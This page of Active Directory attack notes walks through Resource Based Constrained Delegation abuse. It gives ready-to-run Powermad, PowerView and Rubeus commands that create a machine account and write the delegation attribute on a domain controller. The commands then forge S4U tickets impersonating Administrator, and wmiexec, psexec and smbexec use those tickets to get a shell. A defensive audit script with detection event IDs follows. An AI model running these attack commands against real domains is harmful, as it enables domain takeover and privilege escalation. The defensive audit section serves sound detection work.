# Resource Based Constrained Delegation

If we have an account with `GenericAll` over an object, we can create or modify that object, for example reset user passwords or write attributes of machine accounts. Resource Based Constrained Delegation (RBCD) abuse uses this to write the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer.

{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#resource-based-constrained-delegation" %}
Resource Based Constrained Delegation
{% endembed %}

```powershell
# Import Powermad and use it to create a new MACHINE ACCOUNT
Import-Module .\Powermad.ps1
# Or
. .\Powermad.ps1

# Create new machine
New-MachineAccount -MachineAccount lanz -Password $(ConvertTo-SecureString 'buenosdias' -AsPlainText -Force) -Verbose

# Import PowerView and get the SID of our newly created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid

# Then, using the SID, build an ACE for the new machine account with a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Next, set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
# Our target could be: dc.target.com
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

# After that we need the RC4 (NT) hash of the new machine account's password, using Rubeus
Rubeus.exe hash /password:'buenosdias'
```

Or compute the same NT hash with Python 3 (MD4 over the UTF-16LE password; on Python builds linked against OpenSSL 3, `md4` may only be available with the legacy provider enabled):

```python
import hashlib
print(hashlib.new('md4', 'buenosdias'.encode('utf-16le')).hexdigest())
```

```powershell
# For this example, impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:lanz /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/dc.example.com /domain:example.com /ptt
```

Take the base64 ticket that Rubeus prints, copy it to your machine, base64-decode it into a `.kirbi` file and use **ticketConverter.py** to generate the `.ccache` file. Then export the ticket in the environment variable `KRB5CCNAME=ticket.ccache` and use **wmiexec**, **psexec**, **smbexec**, etc. to authenticate as the impersonated user and get a shell.

```bash
# Paste the base64 blob printed by Rubeus into ticket.b64, then decode it to a .kirbi
base64 -d ticket.b64 > ticket.kirbi
python3 ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
wmiexec.py Administrator@dc.example.com -k -no-pass
smbexec.py Administrator@dc.example.com -k -no-pass
psexec.py Administrator@dc.example.com -k -no-pass
```
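From the defender's side, the attribute written above is exactly what to audit. The following script is an added example, not code from the original page nor from Powermad, PowerView or Rubeus. It assumes the RSAT `ActiveDirectory` module is installed on the auditing host and that the caller can read computer objects; the function names `Get-RbcdTrustee`, `Get-MachineAccountQuota` and `Clear-RbcdTrustee` are my own. It lists every computer whose `msDS-AllowedToActOnBehalfOfOtherIdentity` is populated, resolves the trustee SIDs in its ACEs (an unknown or freshly created machine account named there is the signal), reports the domain's `ms-DS-MachineAccountQuota` (the setting that lets an ordinary user create the machine account in the first place), and offers a `-WhatIf`-capable clear.

```powershell
# Added defensive audit example (not from the original page). Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function Get-RbcdTrustee {
    # Every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is set, one row per ACE.
    # The AD module returns the attribute as an ActiveDirectorySecurity object, so .Access is usable directly.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, whenChanged |
    ForEach-Object {
        $computer = $_
        $sd = $computer.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        foreach ($ace in $sd.Access) {
            # Normalise the trustee to a SID, then try to resolve it back to a name; an
            # unresolvable or unexpected account here is what an RBCD takeover looks like.
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
            $name = try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { '<unresolved>' }
            [pscustomobject]@{
                Computer    = $computer.Name
                TrustedSid  = $sid.Value
                TrustedName = $name
                Rights      = $ace.ActiveDirectoryRights
                AceType     = $ace.AccessControlType
                WhenChanged = $computer.whenChanged
            }
        }
    }
}

function Get-MachineAccountQuota {
    # ms-DS-MachineAccountQuota lives on the domain head object; 0 stops non-admins adding machine accounts.
    $domainDn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

function Clear-RbcdTrustee {
    # Remediation: remove the attribute from a computer that should not delegate at all.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$ComputerName)
    if ($PSCmdlet.ShouldProcess($ComputerName, 'Clear msDS-AllowedToActOnBehalfOfOtherIdentity')) {
        Set-ADComputer -Identity $ComputerName -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    }
}

# Usage: report, then review before clearing anything.
Get-RbcdTrustee | Format-Table -AutoSize
"ms-DS-MachineAccountQuota = $(Get-MachineAccountQuota)"
# Clear-RbcdTrustee -ComputerName 'dc' -WhatIf
```

Run the report on a schedule and diff it: legitimate RBCD entries (for example a web front end allowed to delegate to a back-end SQL server) are stable, while an entry naming a machine account nobody recognises, created shortly before `WhenChanged`, matches the procedure on this page. The write itself also produces Security event 4742 (computer account changed) on the domain controller, and the machine account creation produces 4741, so both are worth alerting on when the subject is not an administrator.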
